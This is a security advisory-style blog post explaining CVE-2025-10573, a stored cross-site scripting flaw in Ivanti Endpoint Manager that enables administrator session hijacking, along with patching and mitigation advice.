In the intricate landscape of enterprise IT management, a single vulnerability can unravel the most robust security postures. For organizations relying on Ivanti Endpoint Manager (EPM), a critical flaw has emerged, exposing administrator sessions to potential hijacking. This isn’t merely a theoretical risk; it represents a tangible threat that could grant attackers complete control over your EPM environment without needing initial authentication.

The Critical Flaw: Unauthenticated Administrator Session Hijacking

A severe stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2025-10573, has been discovered in Ivanti EPM versions 2024 SU4 and earlier. This flaw carries a highly concerning CVSS score of 9.6, underscoring its significant potential impact.

At its core, a stored XSS vulnerability allows an attacker to inject malicious scripts directly into a web application’s database. When a legitimate user, particularly an administrator, views a page containing this stored malicious code, their browser executes the script. In the context of this Ivanti EPM vulnerability, this execution could lead to session hijacking. This means an attacker could steal an administrator’s session cookie, effectively impersonating the administrator and gaining full control over their active login session, all without ever needing their credentials.

Understanding the Threat: Why Stored XSS is So Dangerous

Unlike reflected XSS, which requires a user to click a specially crafted link, stored XSS persists. Once the malicious script is embedded, it remains within the application’s database and will execute every time the compromised content is accessed. This makes it particularly dangerous for several reasons:

• Persistence: The payload remains active until it’s removed, potentially affecting multiple users over time.
• Wider Impact: Any user who accesses the compromised section of the application can be affected, not just those who fall for a phishing attempt.
• Administrative Compromise: When an administrator’s session is hijacked, it grants the attacker elevated privileges, allowing them to make widespread changes, deploy malware, exfiltrate data, or disrupt operations.
• Bypass Authentication: A successful session hijack often negates the need for the attacker to possess login credentials, as they are effectively “stepping into” an already authenticated session.

Remediation Actions: Immediate Steps to Secure Your Ivanti EPM

The good news is that Ivanti has already released a patch for CVE-2025-10573. The key to mitigating this risk is prompt action:

• Update to Ivanti EPM 2024 SU4 SR1: The patch was released on December 9, 2025, with the introduction of version 2024 SU4 SR1. Organizations using Ivanti EPM versions 2024 SU4 and below must prioritize upgrading to this patched version immediately.
• Regular Patch Management: This incident underscores the critical importance of a robust patch management strategy. Ensure all software, especially mission-critical management tools like EPM, are kept up-to-date with the latest security fixes.
• Implement Web Application Firewalls (WAFs): While not a replacement for patching, a well-configured WAF can provide an additional layer of defense against XSS attacks by filtering or blocking malicious input.
• Security Awareness Training: Educate IT staff and administrators about the dangers of XSS and best practices for secure browsing, even within internal applications.
• Monitor for Suspicious Activity: Regularly review EPM logs and network traffic for unusual or unauthorized access attempts and activities.

Tools for Detection and Mitigation

Leveraging the right tools can significantly enhance your ability to detect and prevent vulnerabilities like stored XSS.

Tool Name	Purpose	Link
Invanti EPM Update Manager	Official tool for managing EPM updates and patches.	[Accessible via your Ivanti EPM console]
Web Application Firewalls (WAFs)	Provides a protective shield for web applications, filtering malicious requests.	Cloudflare WAF (Example)
Burp Suite Professional	Comprehensive toolkit for web vulnerability scanning and manual testing.	https://portswigger.net/burp
OWASP ZAP	Free and open-source web application security scanner.	https://www.zaproxy.org/

Conclusion

The discovery of CVE-2025-10573 in Ivanti EPM highlights the persistent challenges in securing complex enterprise management platforms. An unauthenticated administrator session hijacking vulnerability with a CVSS score of 9.6 demands immediate attention. By upgrading to Ivanti EPM version 2024 SU4 SR1, implementing robust patch management, and enhancing your overall security posture, organizations can effectively neutralize this significant threat and protect their critical IT infrastructure.